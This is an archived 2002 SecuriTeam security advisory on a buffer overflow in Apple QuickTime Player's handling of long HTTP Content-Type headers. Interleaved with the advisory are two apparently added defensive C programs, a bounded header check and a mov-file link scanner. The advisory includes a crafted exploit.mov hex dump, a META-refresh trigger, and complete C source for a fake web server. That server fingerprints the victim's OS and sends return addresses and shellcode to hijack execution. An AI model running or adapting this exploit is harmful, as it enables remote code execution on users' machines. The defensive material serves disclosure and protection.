[NT] Apple QuickTime Player "Content-Type" Buffer Overflow

From: support@securiteam.com
Date: 02/09/02


From: support@securiteam.com
To: list@securiteam.com
Date: Sat,  9 Feb 2002 15:59:38 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Apple QuickTime Player "Content-Type" Buffer Overflow
------------------------------------------------------------------------

SUMMARY

QuickTime Player can fetch a file published on a web server and play it.
QuickTime Player overflows when the web server sends an HTTP response that
contains a long "Content-Type" header. The overflow overwrites a local
buffer on the client, and the data written past it is then executed on the
client host.

DETAILS

Vulnerable systems:
 * QuickTime Player 5.01 for Windows (Japanese)
 * QuickTime Player 5.02 for Windows (Japanese)

Details:
QuickTime Player overflows when it connects to a web server that sends the
following HTTP response:

HTTP/1.1 200 OK
Date: Wed, 06 Feb 2002 06:56:30 GMT
Server: Apache/1.3.19
Last-Modified: Tue, 15 May 2001 13:37:51 GMT
ETag: "1e001d-7b5-3b01312f"
Accept-Ranges: bytes
Content-Length: 1973
Content-Type: aaaaaaaaaaaa.. long string ..aaaaaaaaaaaaa

The buffer overflow can be confirmed by supplying a long string (about
500 bytes) in the Content-Type line. The saved return address lies at
offset 456; if that position is overwritten with the address of a JMP ESP
instruction, the code placed in the Content-Type buffer is executed.
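The overflow described above is the classic pattern of copying a header value into a fixed-size buffer without checking its length. The C program below is an added illustration, not part of the original advisory and not QuickTime's code: it shows that vulnerable copy next to a bounded version that rejects an over-long Content-Type instead of copying it, and runs the bounded check over two constructed responses (the advisory's response with a normal media type, and the same response carrying a 500-byte value). The 255-byte policy limit, the function names and the sample responses are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Upper bound accepted for a Content-Type value (assumed for this example;
 * real media types are tens of bytes, far below the ~456 bytes the advisory
 * needs to reach the saved return address). */
#define CTYPE_MAX 255

enum ctype_result { CTYPE_OK = 0, CTYPE_MISSING = 1, CTYPE_TOO_LONG = 2 };

/* Case-insensitive match of a header name against the start of a line. */
static int name_matches(const char *line, const char *name, size_t nlen)
{
    for (size_t i = 0; i < nlen; i++)
        if (tolower((unsigned char)line[i]) != tolower((unsigned char)name[i])) return 0;
    return 1;
}

/* Locate a header value in a raw HTTP response: returns a pointer to its first
 * byte and stores its length (up to CRLF) in *vlen, or NULL if absent. */
static const char *find_header(const char *resp, const char *name, size_t *vlen)
{
    size_t nlen = strlen(name);
    const char *line = resp;
    while (line != NULL && *line != '\0') {
        const char *eol = strstr(line, "\r\n");
        size_t llen = eol ? (size_t)(eol - line) : strlen(line);
        if (llen == 0) break;                       /* blank line ends the headers */
        if (llen > nlen && line[nlen] == ':' && name_matches(line, name, nlen)) {
            const char *v = line + nlen + 1;
            while (v < line + llen && (*v == ' ' || *v == '\t')) v++;
            *vlen = (size_t)(line + llen - v);
            return v;
        }
        line = eol ? eol + 2 : NULL;
    }
    return NULL;
}

/* VULNERABLE pattern (illustrative, not QuickTime's code): the value is copied
 * into a fixed 64-byte buffer with no length check, so a ~500-byte value runs
 * past it. Shown for contrast; this example only ever gives it a short value. */
static void copy_content_type_unsafe(const char *resp, char dst[64])
{
    size_t vlen = 0;
    const char *v = find_header(resp, "Content-Type", &vlen);
    if (v == NULL) { dst[0] = '\0'; return; }
    memcpy(dst, v, vlen);                           /* no check that vlen < 64 */
    dst[vlen] = '\0';
}

/* Hardened version: an over-long value is rejected, not silently truncated. */
static enum ctype_result copy_content_type_safe(const char *resp, char *dst, size_t dstlen)
{
    size_t vlen = 0;
    const char *v = find_header(resp, "Content-Type", &vlen);
    if (v == NULL) return CTYPE_MISSING;
    if (vlen > CTYPE_MAX || vlen >= dstlen) return CTYPE_TOO_LONG;
    memcpy(dst, v, vlen);
    dst[vlen] = '\0';
    return CTYPE_OK;
}

/* Constructed samples: the advisory's response with a normal media type, and a
 * builder for its hostile form with a Content-Type of n 'a' bytes. */
static const char benign_response[] =
    "HTTP/1.1 200 OK\r\nServer: Apache/1.3.19\r\n"
    "Content-Type: video/quicktime\r\n\r\n";

static int build_hostile_response(char *out, size_t outlen, size_t n)
{
    const char *head = "HTTP/1.1 200 OK\r\nServer: Apache/1.3.19\r\nContent-Type: ";
    if (strlen(head) + n + 5 > outlen) return -1;   /* head, value, CRLFCRLF, NUL */
    strcpy(out, head);
    memset(out + strlen(head), 'a', n);
    strcpy(out + strlen(head) + n, "\r\n\r\n");
    return 0;
}

/* Outcomes as plain ints so they are easy to check. */
static int benign_result(void)                      /* 1: accepted with the right value */
{
    char ct[256];
    return copy_content_type_safe(benign_response, ct, sizeof ct) == CTYPE_OK
        && strcmp(ct, "video/quicktime") == 0;
}
static int hostile_result(void)                     /* CTYPE_TOO_LONG (2) for 500 bytes */
{
    char resp[1024], ct[256];
    if (build_hostile_response(resp, sizeof resp, 500) != 0) return -1;
    return (int)copy_content_type_safe(resp, ct, sizeof ct);
}

int main(void)
{
    char ct[64];
    copy_content_type_unsafe(benign_response, ct);  /* harmless only because the value is short */
    printf("unsafe copy: %s\nbenign accepted: %d\nhostile result: %d\n",
           ct, benign_result(), hostile_result());
    return 0;
}
```

The safe variant returns an error rather than truncating: a client that silently cut the value to fit would play the file anyway, whereas a rejected response can be logged, and the same length check is the simplest signature a proxy or IDS can apply to responses headed for QuickTime clients.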

A "mov" file that links to the fake web server can be created with the
following file structure:

exploit.mov

 ADDRESS  00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  0123456789ABCDEF
 ------------------------------------------------------------------------
 00000000 00 00 00 43 6D 6F 6F 76 00 00 00 3B 6D 64 72 61  ...Cmoov...;mdra
 00000010 00 00 00 33 64 72 65 66 75 72 6C 20 68 74 74 70  ...3drefurl http
 00000020 3A 2F 2F 77 77 77 2E 73 68 61 64 6F 77 70 65 6E  ://www.shadowpen
 00000030 67 75 69 6E 2E 6F 72 67 3A 32 32 32 2F 78 2E 6D  guin.org:222/x.m
 00000040 6F 76 00                                         ov.

If such a "mov" file is referenced from a META refresh tag, QuickTime
overflows as soon as a visitor opens the web page:

<META HTTP-EQUIV="Refresh" CONTENT="0;URL=exploit.mov">

Furthermore, QuickTime Player reports its own version and the client OS in
the User-Agent header, as follows:

User-Agent: QuickTime (qtver=5.0.2;os=Windows NT 5.0Service Pack 2)

Exploit code can therefore choose the EIP value and egg code appropriate to
the environment of the connected client.

Avoidance:
If you use Internet Explorer, this problem can be avoided by disabling
ActiveX. If you open a "mov" file with QuickTime Player, check the file
manually for an embedded hyperlink. If the mov file does contain a
hyperlink, verify that the "Content-Type" header sent by the web server is
not of a malicious nature.
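The file layout shown above and the advice to check a mov file for an embedded hyperlink come down to the same task: walking the atom tree and looking for a dref "url " reference before the player is allowed to follow it. The C program below is an added example, not the advisory's or Apple's code, that does this for the layout in the advisory (big-endian size + type atoms, moov > mdra > dref, and a "url " tag followed by a NUL-terminated URL inside the dref payload). The sample file bytes, the placeholder host example.invalid and the function names are constructed for the example; the parser follows the advisory's minimal layout and does not implement the full QuickTime dref entry format.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* A QuickTime atom is a 32-bit big-endian size (header included) followed by a
 * 4-byte type tag. The advisory's file nests moov > mdra > dref and puts a
 * "url " tag followed by a NUL-terminated URL inside the dref payload. */
static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Walk the atoms in data[0..len). Returns 1 and copies the URL into out when a
 * "url " reference is found, 0 when the file carries no hyperlink, and -1 when
 * an atom size does not fit inside its parent (truncated or malformed input). */
static int find_url_atom(const unsigned char *data, size_t len, char *out, size_t outlen)
{
    size_t pos = 0;
    while (pos < len) {
        if (len - pos < 8) return -1;                 /* not even a full header */
        uint32_t size = be32(data + pos);
        const unsigned char *type = data + pos + 4;
        if (size < 8 || size > len - pos) return -1;  /* must cover its header and fit */
        const unsigned char *payload = data + pos + 8;
        size_t plen = size - 8;

        if (memcmp(type, "dref", 4) == 0) {
            /* Scan the dref payload for the "url " tag; the string after it runs
             * to a NUL or to the end of the atom, whichever comes first. */
            for (size_t i = 0; i + 4 <= plen; i++) {
                if (memcmp(payload + i, "url ", 4) != 0) continue;
                const unsigned char *s = payload + i + 4;
                size_t n = 0, avail = plen - i - 4;
                while (n < avail && s[n] != '\0') n++;
                if (n >= outlen) n = outlen - 1;
                memcpy(out, s, n);
                out[n] = '\0';
                return 1;
            }
        } else if (memcmp(type, "moov", 4) == 0 || memcmp(type, "mdra", 4) == 0) {
            int r = find_url_atom(payload, plen, out, outlen);   /* descend into containers */
            if (r != 0) return r;
        }
        pos += size;
    }
    return 0;
}

/* Constructed samples. linked_mov mirrors the advisory's layout (moov 0x3E,
 * mdra 0x36, dref 0x2E bytes) but points at a placeholder host; the URL's NUL
 * is written explicitly, so the literal's own terminator is excluded by LEN. */
#define LEN(a) (sizeof(a) - 1)
static const unsigned char linked_mov[] =
    "\x00\x00\x00\x3E" "moov"
    "\x00\x00\x00\x36" "mdra"
    "\x00\x00\x00\x2E" "dref" "url " "http://example.invalid:2222/x.mov\x00";
static const unsigned char plain_mov[] =              /* moov > empty mdra, no link */
    "\x00\x00\x00\x10" "moov" "\x00\x00\x00\x08" "mdra";
static const unsigned char truncated_mov[] =          /* claims 256 bytes, has 8 */
    "\x00\x00\x01\x00" "moov";

static int check_linked(void)                         /* 1 when the URL is recovered */
{
    char url[256];
    return find_url_atom(linked_mov, LEN(linked_mov), url, sizeof url) == 1
        && strcmp(url, "http://example.invalid:2222/x.mov") == 0;
}
static int check_plain(void)                          /* 0: no hyperlink */
{
    char url[256];
    return find_url_atom(plain_mov, LEN(plain_mov), url, sizeof url);
}
static int check_truncated(void)                      /* -1: malformed */
{
    char url[256];
    return find_url_atom(truncated_mov, LEN(truncated_mov), url, sizeof url);
}

int main(void)
{
    char url[256];
    if (find_url_atom(linked_mov, LEN(linked_mov), url, sizeof url) == 1)
        printf("reference movie, points at: %s\n", url);
    printf("plain: %d, truncated: %d\n", check_plain(), check_truncated());
    return 0;
}
```

A file that returns 1 is a reference movie: it contains no media of its own and will make the player open a connection to the embedded URL, so such files can be held back or at least flagged at a mail gateway or proxy before QuickTime handles them. A return of -1 marks a malformed file that should not be trusted either.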

Sample code:
The following code provides a TCP service on port 2222. This fake web
server inspects the User-Agent sent by QuickTime Player and selects the EIP
value and egg code appropriate to the client (Windows XP Home, Windows 2000
Professional, or Windows 98 SE).

/*======================================================================
   Apple QuickTimePlayer 5.02/5.01 Exploit
     for Windows XP Home edition
         Windows2000 Professional (Service Pack 2)
         Windows98 Second Edition
   The Shadow Penguin Security (http://www.shadowpenguin.org)
   Written by UNYUN (unyun@shadowpenguin.org)
  =======================================================================
*/
#include <windows.h>
#include <windowsx.h>
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* strstr(), strchr(), memset(), memcpy() */
#include <winsock.h>
#pragma comment(lib, "wsock32.lib")   /* Winsock 1.1 import library (MSVC) */

#define SERVICE_PORT 2222
#define MAXBUF 4096
#define TGTBUFSIZE 500
#define NOP 0x90
#define RETOFS 456
#define CODEOFS 470
#define RETADR_2000pro 0x77e0af64
#define RETADR_XPhome 0x77e4fb71
#define RETADR_98SE 0xbfb92995

#define UA_2000PRO "Windows NT 5.0Service Pack 2"
#define UA_XPHOME "Windows NT 5.1"
#define UA_98SE "Windows 98 A "

#define ANSWER \
"HTTP/1.1 200 OK\r\n"\
"Date: Wed, 06 Feb 2002 06:56:30 GMT\r\n"\
"Server: Apache/1.3.19\r\n"\
"Last-Modified: Tue, 15 May 2001 13:37:51 GMT\r\n"\
"ETag: \"1e001d-7b5-3b01312f\"\r\n"\
"Accept-Ranges: bytes\r\n"\
"Content-Length: 1973\r\n"\
"Content-Type: %s\r\n\r\n"

static unsigned char egg_2000pro[512]={
  0xB8,0xA5,0xFA,0xE1,0x77,0x33,0xDB,0xB3,
  0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD
};
static unsigned char egg_XPhome[512]={
  0xB8,0xe3,0x02,0xd4,0x77,0x33,0xDB,0xB3,
  0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD
};
static unsigned char egg_98se[512]={
  0xB8,0x2c,0x23,0xf5,0xbf,0x33,0xDB,0xB3,
  0x05,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD
};

int main(int argc,char *argv[])
{
    WSADATA wsa;
    SOCKADDR_IN sAddr,clientAddr;
    SOCKET sock_listen,sock;
    int nClientAddrLen=sizeof(clientAddr);
    static char packetbuf[MAXBUF*2];
    static char buf[MAXBUF],recvbuf[MAXBUF];
    int r;
    unsigned int eip;
    char *p,*q,*qtver,*os;
    unsigned char *egg;

    // Create socket and wait connection
    WSAStartup(MAKEWORD(2,0),&wsa);
    sock_listen=socket(AF_INET,SOCK_STREAM,0);
    sAddr.sin_family = AF_INET;
    sAddr.sin_addr.s_addr = htonl(INADDR_ANY);
    sAddr.sin_port = htons((u_short)(SERVICE_PORT));
    bind(sock_listen,(SOCKADDR *)&sAddr,sizeof(sAddr));
    listen(sock_listen,1);
    printf("Waiting connection (Port %d)...\n",SERVICE_PORT);
    sock=accept(sock_listen,(LPSOCKADDR)&clientAddr,&nClientAddrLen);
    printf("Accepted [from %s].\n",inet_ntoa(clientAddr.sin_addr));

    // Recv request
    if ((r=recv(sock,recvbuf,sizeof(recvbuf)-1,0))==SOCKET_ERROR){
        printf("Can not recv packet\n");
        return(0);
    }
    recvbuf[r]='\0';
    printf("---request------------------------------\n");
    printf("%s\n",recvbuf);
    printf("----------------------------------------\n");
    if ((p=strstr(recvbuf,"User-Agent:"))==NULL){
        printf("Can not select\n");
        printf("%s\n",recvbuf);
        exit(1);
    }
    if ((q=strchr(p,'\r'))!=NULL) *q='\0';
    if ((qtver=strstr(p,"qtver="))==NULL){
        printf("Version is not written in User-Agent\n");
        printf("%s\n",p);
        exit(1);
    }
    qtver+=6;
    // Terminate the version string at the ';' and continue parsing after it.
    // Without this check a User-Agent lacking the ';' would advance a NULL pointer.
    if ((q=strchr(qtver,';'))==NULL){
        printf("Unexpected User-Agent format\n");
        printf("%s\n",qtver);
        exit(1);
    }
    *q++='\0';
    printf("Client version = '%s'\n",qtver);
    if ((p=strchr(q,')'))!=NULL) *p='\0';
    if ((os=strstr(q,"os="))==NULL){
        printf("OS name is not written in User-Agent\n");
        printf("%s\n",q);
        exit(1);
    }
    os+=3;
    printf("Client OS = '%s'\n",os);

    if (!strcmp(os,UA_XPHOME)){
        eip=RETADR_XPhome;
        egg=egg_XPhome;
        printf("Target = WindowsXp Home\n");
    }else if (!strcmp(os,UA_2000PRO)){
        eip=RETADR_2000pro;
        egg=egg_2000pro;
        printf("Target = Windows2000 Professional (SP2)\n");
    }else if (!strcmp(os,UA_98SE)){
        eip=RETADR_98SE;
        egg=egg_98se;
        printf("Target = Windows98 Second Edition\n");
    }else{
        eip=RETADR_2000pro;
        egg=egg_2000pro;
        printf("Target = Unknown.\n");
    }
    
    // Make exploit
    memset(buf,NOP,sizeof(buf));
    buf[RETOFS ]=eip&0xff;
    buf[RETOFS+1]=(eip>>8)&0xff;
    buf[RETOFS+2]=(eip>>16)&0xff;
    buf[RETOFS+3]=(eip>>24)&0xff;
    // The egg arrays contain no zero bytes, so strlen() gives the payload length
    memcpy(buf+CODEOFS,egg,strlen((const char *)egg));
    buf[TGTBUFSIZE]='\0';
    
    // Send exploit
    sprintf(packetbuf,ANSWER,buf);
    if (send(sock,packetbuf,strlen(packetbuf),0)==SOCKET_ERROR){
        printf("Can not send packet\n");
        return(0);
    }

    Sleep(1000);
    closesocket(sock);
    closesocket(sock_listen);
    WSACleanup();
    printf("Done\n");
    return(0);
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:unyun@shadowpenguin.org>
UNYUN.
